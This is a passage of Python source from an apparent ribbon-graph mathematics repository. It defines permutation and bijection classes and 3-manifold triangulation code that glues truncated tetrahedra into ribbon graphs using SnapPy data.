        """Delete label from the mapping and from the domain/codomain sets."""
        output = self.pop(label)
        self.domain.remove(label)
        self.codomain.remove(output)

    def __repr__(self):
        return ''.join(['{}->{}\n'.format(label,self[label]) for label in self])

    def act(self, label):
        """Apply the bijection, treating labels outside the domain as fixed."""
        if label not in self:
            return label
        else:
            return self[label]

    def composed_with(self,other_bijection):
        """Return self followed by other_bijection (codomain must equal its domain)."""
        if self.codomain == other_bijection.domain:
            return Bijection({label: other_bijection[self[label]] for label in self })
        else:
            raise Exception("Domain/codomain don't match")

    def inverse(self):
        """Return the inverse Bijection."""
        return Bijection({self[label]:label for label in self})

    def restricted_to(self, labels):
        """Return the restriction of self to the given labels."""
        return Bijection({label: self[label] for label in labels})
class Permutation(Bijection):
    """A Bijection whose domain equals its codomain, with cycle operations.

    Several methods (undo_two_cycle, insert_after, split_cycle_at, ...)
    mutate self in place rather than returning a new Permutation.
    """
    def __init__(self, dictionary={}, cycles = [], verify=True):
        """Build from a mapping and/or a list of cycles (ordered sequences)."""
        super(Permutation,self).__init__(dictionary=dictionary,verify=False)
        for cycle in cycles:
            self.add_cycle(cycle)
        if verify:
            self.verify()

    def __mul__(self,other_permutation):
        # Composition: apply self first, then other_permutation.
        combined_labels = self.labels().union(other_permutation.labels())
        return Permutation({label: other_permutation.act(self.act(label)) for label in combined_labels })

    def add_cycle(self,cycle):
        # Link each element to its cyclic successor; add_label raises on reuse.
        for i in range(len(cycle)):
            self.add_label(cycle[i], cycle[(i+1)%len(cycle)])

    def verify(self):
        # A permutation must map its label set onto itself.
        assert self.domain == self.codomain

    def fixed_points_removed(self):
        """Copy of self without its fixed points."""
        return Permutation({label: self[label] for label in self if label!=self[label]})

    def fixed_points(self):
        """The set of labels mapped to themselves."""
        return set(i for i in self if self[i]==i)

    def labels(self):
        return set(self.domain)

    def cycle(self, label):
        """The cycle through label, as a list starting at label."""
        c = [label]
        next_label = self[label]
        while next_label != label:
            c.append(next_label)
            next_label = self[next_label]
        return c

    def cycles(self):
        """Cycle decomposition as a list of lists (fixed points included)."""
        labels = self.labels()
        cycles = []
        while labels:
            label = labels.pop()
            cycle = self.cycle(label)
            cycles.append(cycle)
            labels = labels-set(cycle)
        return cycles

    def inverse(self):
        return Permutation({self[label]:label for label in self})

    def previous(self, label):
        """
        Return the element which is sent to label. Hopefully faster than
        computing the entire inverse.
        """
        return self.cycle(label)[-1]

    def restricted_to(self, labels):
        """Restriction to labels; asserts labels are closed under self."""
        for label in labels:
            assert self[label] in labels
        return Permutation({label: self[label] for label in labels})

    def relabeled(self, bijection):
        """Conjugate self by bijection (relabel every element)."""
        return Permutation(bijection.inverse().composed_with(self).composed_with(bijection))

    def relabel_with_integers(self):
        """Relabel with 0..n-1; returns (new_permutation, relabeling_bijection)."""
        relabeling = Bijection({l:i for i,l in enumerate(self.labels())})
        return self.relabeled(relabeling), relabeling

    def sage(self):
        # NOTE(review): SagePermutation's import is commented out at the top
        # of this module, so this raises NameError outside Sage -- confirm.
        labels = list(self.labels())
        cycles = self.cycles()
        i_cycles = [tuple([labels.index(label)+1 for label in cycle]) for cycle in cycles]
        print(i_cycles)
        return SagePermutation(i_cycles)

    def iterate(self, n, label):
        """Apply self n times to label (the inverse when n is negative)."""
        if n<0:
            inverse = self.inverse()
            for i in range(abs(n)):
                label = inverse[label]
            return label
        elif n>0:
            for i in range(n):
                label = self[label]
            return label
        else:
            return label

    def undo_two_cycle(self, label):
        """
        If label is in a two-cycle, then force label and self[label] to be
        fixed points of self. This will correspond to cutting an edge in a
        RibbonGraph. Note that this does not make a new permutation object,
        it alters the internal data of self.
        """
        cycle = self.cycle(label)
        if len(cycle) == 2:
            for l in cycle:
                self[l] = l
        else:
            raise Exception("Given label not in 2-cycle")

    def insert_after(self, previous_label, new_label):
        """
        Insert new_label into the cycle containing previous_label, between
        previous_label and self[previous_label]. That is, change
        previous_label --> self[previous_label]
        to
        previous_label --> new_label --> self[previous_label]
        This function does not make a new Permutation; it alters self.
        new_label must not be already in the permutation.
        """
        if new_label in self:
            raise Exception("Cannot insert label because it is already used in the permutation")
        self[new_label] = self[previous_label]
        self[previous_label] = new_label

    def split_cycle_at(self, label1, label2):
        """
        Takes two labels on the same cycle and splits the cycle into two.
        It short-circuits the cycle after label1 to skip to the label after
        label2, and vice versa. Here's an example:
        sage: P = Permutation(cycles = [(1,2,3,4,5)])
        sage: P.split_cycle_at(3,5)
        sage: P.cycles()
        [[1, 2, 3], [4, 5]]
        This will correspond to splitting a vertex for ribbon graphs. This
        function doesn't make a new permutation, it alters self.
        Equivalent to multiplying on the left by the transposition
        (label1 label2)
        """
        if label2 not in self.cycle(label1):
            raise Exception("The two labels are not on the same cycle.")
        label1_next = self[label1]
        label2_next = self[label2]
        self[label1] = label2_next
        self[label2] = label1_next

    def split_label_from_cycle(self, label):
        """
        Takes a single label and disconnect from the rest of its cycle.
        """
        self.split_cycle_at(label, self.previous(label))

    def merge_cycles_at(self, label1, label2):
        """
        Takes two labels on different cycles and merge the cycles into one.
        It short-circuits the cycle after label1 to skip to the label after
        label2, and vice versa.
        (NOTE(review): the worked example in the original docstring was
        copied from split_cycle_at; merging is its inverse operation.)
        This will correspond to merging a vertex for ribbon graphs. This
        function doesn't make a new permutation, it alters self.
        Equivalent to multiplying on the left by the transposition
        (label1 label2)
        """
        if label2 in self.cycle(label1):
            raise Exception("The two labels are on the same cycle.")
        label1_next = self[label1]
        label2_next = self[label2]
        self[label1] = label2_next
        self[label2] = label1_next

    def remove_cycle(self, label):
        """Remove the entire cycle through label from self (in place)."""
        for l in self.cycle(label):
            self.remove_label(l)

    def remove_fixed_point(self, label):
        """Remove label from self if it is a fixed point; raise otherwise."""
        if label == self[label]:
            self.remove_label(label)
        else:
            raise Exception("Given label not a fixed point.")

    def union(self, other_permutation):
        """Combine two permutations on (assumed) disjoint label sets."""
        U = Permutation()
        for i in self:
            U[i] = self[i]
        for i in other_permutation:
            U[i] = other_permutation[i]
        return U

    def append_label(self, extra_label):
        """
        Append an addition specified label onto every label in the permutation.
        L --> (L, extra_label)
        """
        return Permutation({(label,extra_label):(self[label],extra_label) for label in self})

    def disjoint_union(self, other_permutation):
        """Union with labels tagged (label, 0) / (label, 1) to avoid clashes."""
        combined = {}
        for label in self:
            combined[(label,0)] = (self[label],0)
        for label in other_permutation:
            combined[(label,1)] = (other_permutation[label],1)
        return Permutation(combined)

    def is_identity(self):
        for label in self:
            if self[label] != label:
                return False
        return True

    def make_commute_along_cycles(self, smaller_permutation):
        """
        Given a permutation which acts on a subset of self.labels, try and
        extend the smaller permutation to a permutation on all of self.labels
        which commutes with self.
        """
        smaller_permutation = Permutation(smaller_permutation.copy())
        for label in smaller_permutation.labels():
            label_cycle = self.cycle(label)
            pushed_label_cycle = self.cycle(smaller_permutation[label])
            # Commuting forces matching cycle lengths...
            if len(label_cycle) != len(pushed_label_cycle):
                raise Exception("The permutation can't be extended to commute.")
            # ...and determines the image of the whole cycle elementwise.
            for l1, l2 in zip(label_cycle,pushed_label_cycle):
                if l1 in smaller_permutation:
                    if smaller_permutation[l1] != l2:
                        raise Exception("The permutation can't be extended to commute.")
                smaller_permutation[l1]=l2
        return smaller_permutation
def permutation_from_bijections(bijections):
    """Merge several Bijections into a single Permutation."""
    merged = Bijection()
    for mapping in bijections:
        for label in mapping:
            merged[label] = mapping[label]
    return Permutation(merged)
def random_permutation(labels):
    """Return a uniformly random Permutation of *labels*."""
    shuffled = list(labels)
    shuffle(shuffled)
    return Permutation(dict(zip(labels, shuffled)))
def random_cycle(labels):
    """Return a Permutation that is one cycle through *labels* in random order.

    BUG FIX: the original shuffled the caller's list in place; we copy first,
    which also generalizes the function to accept any sequence (e.g. a tuple).
    """
    labels = list(labels)
    shuffle(labels)
    return Permutation(cycles=[labels])
def four_cycles(num_vertices):
    """Permutation made of num_vertices disjoint 4-cycles on labels 0..4n-1."""
    quads = [list(range(4 * i, 4 * i + 4)) for i in range(num_vertices)]
    return Permutation(cycles=quads)
|
{"/ribbon_graph_base.py": ["/permutation.py", "/cycle.py"], "/maps.py": ["/permutation.py"], "/draw.py": ["/cycle.py", "/decompositions.py"], "/decompositions.py": ["/cycle.py"], "/__init__.py": ["/ribbon_graph_base.py", "/cycle.py", "/maps.py", "/permutation.py", "/trees.py", "/decompositions.py"], "/cycle.py": ["/local_moves.py"], "/trees.py": ["/ribbon_graph_base.py", "/permutation.py"], "/three_manifold.py": ["/permutation.py", "/ribbon_graph_base.py", "/cycle.py", "/local_moves.py"]}
|
27,862
|
malikobeidin/ribbon_graph
|
refs/heads/master
|
/three_manifold.py
|
from permutation import Permutation, Bijection
from ribbon_graph_base import *
from cycle import *
from local_moves import contract_edge
class Triangulation(object):
    def __init__(self, tetrahedra_ribbon_graph, glued_to, check_consistency = True):
        """
        Specify a triangulation of a 3-manifold with:
        tetrahedra_ribbon_graph: a ribbon graph whose faces are all
        size 3, and whose connected components are all
        the tetrahedral map.
        glued_to: a permutation which shows which faces are glued.
        A directed edge in a tetrahedron uniquely specifies
        how to glue two faces, by gluing the faces to the left
        of each directed edge. This permutation must commute with
        the next_corner permutation of the tetrahedra_ribbon_graph
        to make it so that faces are glued consistently.
        """
        self.tetrahedra_ribbon_graph = tetrahedra_ribbon_graph
        if check_consistency:
            # Extend the gluing so it commutes with next_corner, i.e. glues
            # whole faces consistently rather than single directed edges.
            next_corner = self.tetrahedra_ribbon_graph.next_corner()
            glued_to = next_corner.make_commute_along_cycles(glued_to)
        self.glued_to = glued_to

    def tetrahedra(self):
        """The tetrahedra, as connected components of the ribbon graph."""
        return self.tetrahedra_ribbon_graph.connected_components()

    def edges(self):
        """Edge classes of the triangulation, as cycles of next * glued_to."""
        # BUG FIX: the original referenced an undefined global ``D``
        # (``D.glued_to``), which raised NameError; use self.glued_to.
        return (self.tetrahedra_ribbon_graph.next * self.glued_to).cycles()

    def vertex_links(self):
        """The ribbon graph formed by the links of the vertices."""
        return RibbonGraph([self.glued_to, self.tetrahedra_ribbon_graph.next.inverse()])
class TruncatedTetrahedron(object):
    """A SnapPy tetrahedron with its vertices truncated, plus the face pairing
    data needed to glue copies together.

    NOTE(review): contains leftover debugging print statements.
    """
    def __init__(self, tet):
        self.tetrahedron = tet
        self.ribbon_graph = truncate_vertices(tetrahedron().dual())
        self.pairing = self.snappy_tetrahedron_to_edge_pairing()
        self.labeled = self.labeled_ribbon_graph()

    def vertex(self, directed_edge):
        """
        From a directed edge 'ab', get the vertex in the truncated tetrahedron
        which has this vertex. Each directed edge in the original tetrahedron
        corresponds to a vertex in the truncated tetrahedron.
        """
        return self.ribbon_graph.vertex(directed_edge)

    def boundary_edge_from_directed_edge(self, directed_edge):
        """
        Return a label on the triangular face on which the vertex corresponding
        to directed_edge is located.
        """
        return self.ribbon_graph.next[directed_edge]

    def boundary_triangle_from_directed_edge(self, directed_edge):
        """The full triangular face containing the label above."""
        return self.ribbon_graph.face(self.ribbon_graph.next[directed_edge])

    def snappy_tetrahedron_to_edge_pairing(self):
        """Translate SnapPy's face gluing data into label pairs on the
        truncated tetrahedra (labels prefixed with the tetrahedron index)."""
        tet = self.tetrahedron
        gluing = tet.Gluing
        neighbor = tet.Neighbor
        # One representative directed edge per face, with the SnapPy bitmask
        # of the face to its left.
        directed_edge_choices = ['32','23','10','01']
        corresponding_left_faces = [7, 11, 13, 14] #[F3, F2, F1, F0]
        permutations = [Permutation(gluing[i].dict) for i in corresponding_left_faces]
        corresponding_neighbors = [neighbor[i].Index for i in corresponding_left_faces]
        pairing = []
        for e, perm, index in zip(directed_edge_choices,permutations, corresponding_neighbors):
            print(tet.Index, index)
            print(perm)
            vs = self.boundary_edge_from_directed_edge(e)
            # Push the directed edge through the gluing permutation, reversing
            # orientation so the glued faces match up.
            new_e = ''.join(reversed([str(perm[int(v)]) for v in e]))
            new_vs = self.boundary_edge_from_directed_edge(new_e)
            print(e,new_e)
            print(vs, new_vs)
            print(self.ribbon_graph.face(vs), self.ribbon_graph.face(new_vs))
            pairing.append( (str(tet.Index)+vs, str(index)+new_vs) )
        print('\n\n')
        return pairing

    def labeled_ribbon_graph(self):
        """Copy of the ribbon graph with every label prefixed by the tet index."""
        l = str(self.tetrahedron.Index)
        new_opposite = {(l+i):(l+self.ribbon_graph.opposite[i]) for i in self.ribbon_graph.opposite}
        new_next = {(l+i):(l+self.ribbon_graph.next[i]) for i in self.ribbon_graph.next}
        return RibbonGraph([Permutation(new_opposite), Permutation(new_next)])
def heegaard_surface(mcomplex):
    """Glue the truncated tetrahedra of a SnapPy Mcomplex along their face
    pairings, producing one ribbon graph (a Heegaard-type surface).

    NOTE(review): contains leftover debugging print statements.
    """
    truncated_tets = [TruncatedTetrahedron(tet) for tet in mcomplex.Tetrahedra]
    # Seed the union with one tetrahedron, then merge in the rest.
    truncated_tet = truncated_tets.pop()
    R = truncated_tet.labeled
    pairings = [truncated_tet.pairing]
    for truncated_tet in truncated_tets:
        R = R.union(truncated_tet.labeled)
        pairings.append(truncated_tet.pairing)
    print(pairings)
    all_face_labels = []
    for pairing in pairings:
        for label1, label2 in pairing:
            all_face_labels.append((R.face(label1), R.face(label2)))
    print(all_face_labels)
    for pairing in pairings:
        for label1, label2 in pairing:
            labels = R.labels()
            # Skip pairs whose labels were already consumed by a previous gluing.
            if (label1 in labels) and (label2 in labels):
                R = R.glue_faces(label1, label2)
    return R
# Bitmask encoding of the subsimplices of a tetrahedron: bit i set means
# vertex i belongs to the subsimplex (N = empty, V* = vertices, E* = edges,
# F* = faces, T = the whole tetrahedron).
N = 0    # 0000
V0 = 1   # 0001
V1 = 2   # 0010
E01 = 3  # 0011 <-----|
V2 = 4   # 0100       |
E02 = 5  # 0101 <---| |
E21 = 6  # 0110 <-| | |
F3 = 7   # 0111   | | |
V3 = 8   # 1000   | | | Opposite edges
E03 = 9  # 1001 <-| | |
E13 = 10 # 1010 <---| |
F2 = 11  # 1011       |
E32 = 12 # 1100 <-----|
F1 = 13  # 1101
F0 = 14  # 1110
T = 15   # 1111
# User-friendly aliases: the same edge under the opposite orientation name.
E10 = 3
E20 = 5
E12 = 6
E30 = 9
E31 = 10
E23 = 12
# A simplex is oriented like this:
# 1
# /|\
# / | \
# / | \
# 2---|---3
# \ | /
# \ | /
# \|/
# 0
#
def tetrahedron(label=None):
    """The tetrahedral map as a RibbonGraph on directed-edge labels 'ab'.

    Label 'ab' is the half-edge at vertex a pointing toward vertex b;
    'opposite' swaps orientation, 'next' rotates around each vertex.
    If *label* is given it is appended to every half-edge label.
    """
    next = Permutation(cycles=[('01','02','03'),
                               ('12','10','13'),
                               ('20','21','23'),
                               ('30','32','31')])
    opposite = Permutation(cycles=[('01','10'),
                                   ('02','20'),
                                   ('03','30'),
                                   ('12','21'),
                                   ('13','31'),
                                   ('23','32')])
    if label:
        return RibbonGraph([opposite.append_label(label), next.append_label(label)])
    else:
        return RibbonGraph([opposite, next])
def tetrahedron_old(label=None):
    """Legacy variant of tetrahedron() using (a, b) tuple labels
    instead of 'ab' strings; kept for reference."""
    next = Permutation(cycles=[((0,1),(0,3),(0,2)),
                               ((1,2),(1,3),(1,0)),
                               ((2,0),(2,3),(2,1)),
                               ((3,0),(3,1),(3,2))])
    opposite = Permutation(cycles=[((0,1),(1,0)),
                                   ((0,2),(2,0)),
                                   ((0,3),(3,0)),
                                   ((1,2),(2,1)),
                                   ((1,3),(3,1)),
                                   ((2,3),(3,2))])
    if label:
        return RibbonGraph([opposite.append_label(label), next.append_label(label)])
    else:
        return RibbonGraph([opposite, next])
def snappy_tetrahedron_to_face_gluings(snappy_tetrahedron):
    """Describe a SnapPy tetrahedron's face gluings as human-readable pairs
    like 'F0 of tet1' -> 'F2 of tet3'."""
    # One representative directed edge per face, with the SnapPy bitmask of
    # the face to its left.
    directed_edge_choices = ['01','10','23','32']
    corresponding_left_faces = [7, 11, 13, 14] #[F3, F2, F1, F0]
    permutations = [Permutation(snappy_tetrahedron.Gluing[i].dict) for i in corresponding_left_faces]
    neighbor_indices = [snappy_tetrahedron.Neighbor[i].Index for i in corresponding_left_faces]
    T = tetrahedron()
    face_pairing = []
    edge_pairing = []
    face_label_pairing = []
    i = snappy_tetrahedron.Index
    for directed_edge, permutation, neighbor_i in zip(directed_edge_choices, permutations, neighbor_indices):
        # Push the directed edge through the gluing, reversing orientation.
        directed_edge_permuted = ''.join(reversed([str(permutation[int(s)]) for s in directed_edge]))
        edge_pairing.append([(i,directed_edge), (neighbor_i,directed_edge_permuted)])
        face_pairing.append([(i,T.face(directed_edge)), (neighbor_i,T.face(directed_edge_permuted))])
        # A face is named by its missing vertex: remove the three vertices
        # appearing in the face's labels from {0,1,2,3}.
        missing_label = set('0123')-set(T.face(directed_edge)[0])-set(T.face(directed_edge)[1])-set(T.face(directed_edge)[2])
        missing_label = missing_label.pop()
        missing_neighbor_label = set('0123')-set(T.face(directed_edge_permuted)[0])-set(T.face(directed_edge_permuted)[1])-set(T.face(directed_edge_permuted)[2])
        missing_neighbor_label = missing_neighbor_label.pop()
        face_label_pairing.append(['F{} of tet{}'.format(missing_label, i),'F{} of tet{}'.format(missing_neighbor_label, neighbor_i)])
    # NOTE(review): face_pairing and edge_pairing are computed but not
    # returned -- confirm whether they were meant to be part of the result.
    return face_label_pairing
class Tetrahedron(object):
    """Couples a snappy/t3mlite tetrahedron with ribbon-graph models of its
    boundary surface.

    Two models are kept: `ribbon_graph`, the plain boundary, and
    `cut_ribbon_graph`, the boundary with edges thickened and vertices
    truncated (labels gain `_0`/`_1` and `a,b` corner suffixes).
    """
    def __init__(self, snappy_tetrahedron):
        # Plain ribbon-graph model of the tetrahedron's boundary.
        self.ribbon_graph = tetrahedron()
        # "Cut" model: edges thickened, then vertices truncated.
        self.cut_ribbon_graph = truncate_vertices(thicken_edges(tetrahedron()))
        self.snappy_tetrahedron = snappy_tetrahedron
        # t3mlite face bitmask codes: face opposite vertex v maps to code.
        self.snappy_label_to_code = {0:14, 1:13, 2:11, 3:7}
    def face_from_missing_vertex(self, v):
        """Return the ribbon-graph face opposite vertex v (v in 0..3)."""
        if v == 0:
            return self.ribbon_graph.face('32')
        elif v == 1:
            return self.ribbon_graph.face('23')
        elif v == 2:
            return self.ribbon_graph.face('10')
        elif v == 3:
            return self.ribbon_graph.face('01')
        else:
            raise Exception()
    def face_from_snappy_label(self, i):
        """Return the ribbon-graph face for a t3mlite face code i in {14,13,11,7}.

        Mirrors face_from_missing_vertex via snappy_label_to_code.
        """
        if i == 14:
            return self.ribbon_graph.face('32')
        elif i == 13:
            return self.ribbon_graph.face('23')
        elif i == 11:
            return self.ribbon_graph.face('10')
        elif i == 7:
            return self.ribbon_graph.face('01')
        else:
            raise Exception()
    def edge_mapping(self):
        """Return, for each face, a dict mapping this tetrahedron's labelled
        directed edges ('<tet>|<edge>') to the neighbor's corresponding
        labelled directed edges under the face gluing.

        Only orientation-preserving gluings are supported (sign() == 1).
        """
        mappings = []
        tet_index = str(self.snappy_tetrahedron.Index)
        for i in [14,13,11,7]:
            assert self.snappy_tetrahedron.Gluing[i].sign() == 1
            perm = Permutation(self.snappy_tetrahedron.Gluing[i].dict)
            neighbor = str(self.snappy_tetrahedron.Neighbor[i].Index)
            face = self.face_from_snappy_label(i)
            edge_mapping = {}
            for directed_edge in face:
                directed_edge_permuted = ''.join([str(perm[int(s)]) for s in directed_edge])
                # Take the opposite half-edge so orientations match up.
                directed_edge_permuted = self.ribbon_graph.opposite[directed_edge_permuted]
                edge_mapping[tet_index+'|'+directed_edge]=neighbor+'|'+directed_edge_permuted
            mappings.append(edge_mapping)
        return mappings
    def face_pairing(self):
        """Return a dict 'F<v> of tet<i>' -> 'F<w> of tet<j>' describing how
        each face is glued to the neighboring tetrahedron's face.
        """
        face_mapping = {}
        tet_index = str(self.snappy_tetrahedron.Index)
        for i in range(4):
            code = self.snappy_label_to_code[i]
            assert self.snappy_tetrahedron.Gluing[code].sign() == 1
            perm = Permutation(self.snappy_tetrahedron.Gluing[code].dict)
            neighbor = str(self.snappy_tetrahedron.Neighbor[code].Index)
            # Any one directed edge of the face determines the face.
            directed_edge = self.face_from_missing_vertex(i)[0]
            directed_edge_permuted = ''.join([str(perm[int(s)]) for s in directed_edge])
            directed_edge_permuted = self.ribbon_graph.opposite[directed_edge_permuted]
            opposite_face = self.snappy_label_from_face(directed_edge_permuted)
            face_mapping['F{} of tet{}'.format(i,tet_index)]='F{} of tet{}'.format(opposite_face,neighbor)
        return face_mapping
    def snappy_label_from_face(self, directed_edge):
        """Return the vertex label ('0'..'3') NOT incident to the face
        containing directed_edge — i.e. the face's snappy vertex label.
        """
        face = self.ribbon_graph.face(directed_edge)
        v = set('0123')
        for l in face:
            v = v-set(l)
        return v.pop()
    def directed_edge_to_cut_face_label(self, directed_edge):
        """Map a plain directed-edge label to its '_1' label in the cut model."""
        return directed_edge+'_1'
    def edge_mapping_on_cut_faces(self):
        """Same as edge_mapping(), with every label translated to its '_1'
        counterpart in the cut ribbon graph.
        """
        edge_mapping = self.edge_mapping()
        return [{i+'_1':j+'_1' for i,j in mapping.items()} for mapping in edge_mapping]
    def with_tet_label(self):
        """Return the cut ribbon graph with every label prefixed by
        '<tet index>|' so unions over tetrahedra have disjoint labels.
        """
        si = str(self.snappy_tetrahedron.Index)+'|'
        op = self.cut_ribbon_graph.opposite
        new_op = Permutation({si+label : si+op[label] for label in op})
        next = self.cut_ribbon_graph.next
        new_next = Permutation({si+label : si+next[label] for label in next})
        return RibbonGraph([new_op,new_next])
    def directed_edge_to_vertex_corner(self, directed_edge):
        """Return the two cut-graph labels flanking the vertex corner that
        the given directed edge points at.
        """
        l01 = '{}_0,{}_1'.format(directed_edge, directed_edge)
        return self.cut_ribbon_graph.next_corner()[l01],self.cut_ribbon_graph.next[l01]
    def add_normal_curve(self, directed_edge, num_crossings):
        # NOTE(review): incomplete in the original source — computes the
        # corner labels but never uses them or num_crossings; presumably
        # meant to insert a normal curve. Confirm intent before relying on it.
        l1, l2 = self.directed_edge_to_vertex_corner(directed_edge)
class TriangulationSkeleton(object):
    """Ribbon-graph skeleton built from the cut tetrahedra of a t3mlite
    Mcomplex.

    The labelled cut ribbon graphs of all tetrahedra are unioned, their
    boundary faces are glued according to the tetrahedron gluings, and the
    resulting lace components are classified into face curves and edge
    curves of the triangulation.

    Fixes over the original:
    - pair_edge_mappings used `mapping.items()[0]`, which raises TypeError
      in Python 3 (dict views are not indexable).
    - print_data unpacked edge_curves entries as 4-tuples although they are
      stored as 2-tuples, raising ValueError.
    - lace_component_intersection_graph contained a bare `new_labels`
      expression that raised NameError; it is now an explicit stub.
    """
    def __init__(self, mcomplex, meridian_info=None):
        self.tetrahedra = [Tetrahedron(tet) for tet in mcomplex.Tetrahedra]
        # Disjoint union of all labelled cut tetrahedra.
        self.ribbon_graph = RibbonGraph([Permutation(), Permutation()])
        for tet in self.tetrahedra:
            self.ribbon_graph = self.ribbon_graph.union(tet.with_tet_label())
        if meridian_info:
            self.add_meridian()
        self.glue_boundary_faces()
        self.classify_lace_components()
    def pair_edge_mappings(self):
        """Pair each per-face edge mapping with its inverse mapping on the
        glued neighbor face. Returns a list of (mapping, inverse) tuples.
        """
        edge_mappings = []
        paired = []
        for tet in self.tetrahedra:
            edge_mappings.extend(tet.edge_mapping_on_cut_faces())
        while edge_mappings:
            mapping = edge_mappings.pop()
            # Fix: dict views are not indexable in Python 3.
            source, target = next(iter(mapping.items()))
            for other_mapping in edge_mappings:
                if target in other_mapping:
                    # Exactly one inverse mapping exists per face gluing.
                    edge_mappings.remove(other_mapping)
                    paired.append((mapping, other_mapping))
        return paired
    def glue_boundary_faces(self):
        """Glue the boundary faces of the union along the paired edge
        mappings, recording each glued face cycle in self.cycles.
        """
        paired = self.pair_edge_mappings()
        self.cycles = []
        for mapping, other_mapping in paired:
            # Sanity check: the two mappings must be mutually inverse.
            for label in mapping:
                assert other_mapping[mapping[label]] == label
            label1, label2 = mapping.popitem()
            self.cycles.append(self.ribbon_graph.face(label1))
            self.ribbon_graph = self.ribbon_graph.glue_faces(label1,label2)
    def classify_lace_components(self):
        """Pair up opposite lace components and classify each pair as a face
        curve (meets a glued face cycle) or an edge curve; also record, for
        each edge curve, the opposite edge curve across the corner.
        """
        lace_components = set(map(tuple, self.ribbon_graph.lace_components()))
        self.face_curves = []
        self.edge_curves = []
        while lace_components:
            lc = lace_components.pop()
            op_lc = None
            for other_lc in lace_components:
                if self.ribbon_graph.opposite[lc[0]] in other_lc:
                    op_lc = other_lc
                    break
            lace_components.remove(op_lc)
            is_face_curve = False
            for cycle in self.cycles:
                if (lc[0] in cycle) or (op_lc[0] in cycle):
                    is_face_curve = True
                    break
            if is_face_curve:
                self.face_curves.append( (lc, op_lc) )
            else:
                # Order edge-curve pairs so the first component lies on a
                # square (length-4) face.
                if len(self.ribbon_graph.face(lc[0]))==4:
                    self.edge_curves.append( (lc, op_lc) )
                else:
                    self.edge_curves.append( (op_lc, lc) )
        nc_squared = self.ribbon_graph.next_corner()*self.ribbon_graph.next_corner()
        edge_curve_set = set(self.edge_curves)
        self.opposite_edge_curves = {}
        while edge_curve_set:
            ec, ec_op = edge_curve_set.pop()
            l = nc_squared[ec[0]]
            ec_opposite_comp = None
            for other_ec, other_ec_op in edge_curve_set:
                if l in other_ec:
                    ec_opposite_comp = other_ec
                    break
            self.opposite_edge_curves[ec] = ec_opposite_comp
    def print_data(self):
        """Print a human-readable summary: genus, vertices, faces, and the
        face/edge curves, with half-edges numbered +/-i in opposite pairs.
        """
        label_numbering = {}
        R = self.ribbon_graph
        labels = R.labels()
        i = 1
        X = R.euler_characteristic()
        assert X % 2 == 0
        print('Genus: {}'.format((2-X)//2))
        while labels:
            l = labels.pop()
            o = R.opposite[l]
            labels.remove(o)
            label_numbering[l] = i
            label_numbering[o] = -i
            i+=1
        print('vertices:')
        for v in R.vertices():
            print([label_numbering[l] for l in v])
        print('faces:')
        for f in R.faces():
            print([label_numbering[l] for l in f])
        print('face curves:')
        for fc, op_fc in self.face_curves:
            print([label_numbering[l] for l in fc])
            print([label_numbering[l] for l in op_fc])
            print('')
        print('edge curves:')
        # Fix: edge_curves entries are (lc, op_lc) pairs, not 4-tuples.
        for ec, op_ec in self.edge_curves:
            print([label_numbering[l] for l in ec])
            print([label_numbering[l] for l in op_ec])
            print('')
    def cut_open(self):
        """Cut the ribbon graph open along every edge curve and return the
        resulting ribbon graph.
        """
        R = self.ribbon_graph.copy()
        for lc, op_lc in self.edge_curves:
            C = cycle_from_lace_component(R, lc[0])
            print(C)
            R = C.cut()
        return R
    def with_edges_contracted(self):
        """Return a copy with every recorded opposite edge curve deleted."""
        R = self.ribbon_graph.copy()
        for ec in self.opposite_edge_curves.values():
            if ec:
                print(ec)
                for l in ec:
                    delete_edge(R,l)
        return R
    def lace_component_intersection_graph(self):
        # Unfinished in the original source (a bare `new_labels` name that
        # raised NameError); made an explicit stub.
        raise NotImplementedError(
            'lace_component_intersection_graph is not implemented')
    def add_meridian(self):
        # Placeholder: meridian_info handling is not implemented yet.
        pass
def truncate_vertices(ribbon_graph):
    """Truncate every vertex of the ribbon graph.

    Each half-edge label `l` spawns two corner labels 'l,prev' and 'l,next'
    (comma-joined strings); the new `next` permutation walks around the small
    triangle replacing the vertex, and `opposite` pairs the corner labels of
    adjacent half-edges.
    """
    op = dict(ribbon_graph.opposite)
    nxt = {}
    prev_of = ribbon_graph.next.inverse()
    for lab in ribbon_graph.labels():
        succ = ribbon_graph.next[lab]
        pred = prev_of[lab]
        corner_succ = lab + ',' + succ
        corner_pred = lab + ',' + pred
        nxt[lab] = corner_succ
        nxt[corner_pred] = lab
        nxt[corner_succ] = corner_pred
        op[corner_succ] = succ + ',' + lab
        op[succ + ',' + lab] = corner_succ
    return RibbonGraph(permutations=[Permutation(op), Permutation(nxt)])
def thicken_edges(ribbon_graph):
    """Thicken every edge of the ribbon graph.

    Each half-edge label `l` is split into 'l_0' and 'l_1'; `opposite`
    crosses the thickened edge (swapping the 0/1 sides) and `next` first
    steps from 'l_0' to 'l_1', then on to the old successor's '_0' side.
    """
    op = {}
    nxt = {}
    for lab in ribbon_graph.labels():
        partner = ribbon_graph.opposite[lab]
        side0, side1 = lab + '_0', lab + '_1'
        op[side0] = partner + '_1'
        op[side1] = partner + '_0'
        nxt[side0] = side1
        nxt[side1] = ribbon_graph.next[lab] + '_0'
    return RibbonGraph(permutations=[Permutation(op), Permutation(nxt)])
def truncate_vertices_old(ribbon_graph):
    """Older variant of truncate_vertices using (label, label) tuples instead
    of comma-joined strings for the new corner labels. Kept for reference.
    """
    op = dict(ribbon_graph.opposite)
    nxt = {}
    prev_of = ribbon_graph.next.inverse()
    for lab in ribbon_graph.labels():
        succ = ribbon_graph.next[lab]
        pred = prev_of[lab]
        nxt[lab] = (lab, succ)
        nxt[(lab, pred)] = lab
        nxt[(lab, succ)] = (lab, pred)
        op[(lab, succ)] = (succ, lab)
        op[(succ, lab)] = (lab, succ)
    return RibbonGraph(permutations=[Permutation(op), Permutation(nxt)])
def triangulation_from_pairing(pairing):
    """
    Given pairs of tuples ((directed_edge1,tet_label1),(directed_edge2,tet_label2)), return a Triangulation object with those gluings.
    """
    gluing = Permutation(cycles=pairing)
    tets = {}
    for (edge_a, tet_a), (edge_b, tet_b) in pairing:
        # Create each tetrahedron the first time its label is seen.
        for lbl in (tet_a, tet_b):
            if lbl not in tets:
                tets[lbl] = tetrahedron(lbl)
    union = RibbonGraph([Permutation(), Permutation()])
    for tet in tets.values():
        union = union.union(tet)
    return Triangulation(union, gluing)
def triangulation_from_tuples(tuples):
    """
    Given 6-tuples (v1, v2 ,tet_label1, w1, w2 , tet_label2), return a Triangulation object with those gluings.
    """
    tets = {}
    pairing = []
